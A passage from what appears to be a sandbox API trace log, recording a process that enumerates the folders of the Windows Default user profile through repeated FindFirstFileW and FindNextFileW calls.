cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0071.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0071.958] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0071.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0071.958] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0071.959] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0071.959] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0071.959] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0071.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0071.998] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0071.999] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0071.999] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0071.999] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0071.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0072.002] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0072.002] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0072.002] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.003] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0072.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71f010 [0072.005] FindNextFileW (in: hFindFile=0x71f010, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0072.005] FindClose (in: hFindFile=0x71f010 | out: hFindFile=0x71f010) returned 1 [0072.006] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.006] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0072.006] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.006] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0072.006] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0072.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.009] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0072.009] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.009] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0072.009] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0072.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717dd0, ftCreationTime.dwLowDateTime=0x7174b0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0072.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0072.010] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0072.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.010] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="..", cAlternateFileName="")) returned 1 [0072.010] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.010] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0072.010] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0072.010] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717dd0, ftCreationTime.dwLowDateTime=0x7174b0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0072.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0072.011] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0072.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x717198 | out: lpFindFileData=0x717198*(dwFileAttributes=0x717dd0, ftCreationTime.dwLowDateTime=0x7174b0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x68210720, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0072.011] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717198 | out: hHeap=0x6d0000) returned 1 [0072.011] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0072.011] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.012] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0072.012] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.012] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.012] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0072.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x70b3c8, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x20, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0072.012] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.012] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0072.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x70b3c8, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x20, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0072.012] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.012] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0072.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.013] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0072.013] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.013] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.013] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0072.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName=".", cAlternateFileName="")) returned 0x71efd0 [0072.016] FindNextFileW (in: hFindFile=0x71efd0, lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x20, cFileName="..", cAlternateFileName="")) returned 1 [0072.016] FindClose (in: hFindFile=0x71efd0 | out: hFindFile=0x71efd0) returned 1 [0072.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.017] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0072.017] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\SendTo\\*", lpFindFileData=0x717dd0 | out: lpFindFileData=0x717dd0*(dwFileAttributes=0x70b3c8, ftCreationTime.dwLowDateTime=0x1312050, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x0, dwReserved1=0x20, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0072.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717dd0 | out: hHeap=0x6d0000) returned 1 [0072.017] FindNextFileW (in: hFindFile=0x71ef90, lpFindFileData=0x1312620 | out: lpFindFileData=0x1312620*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, 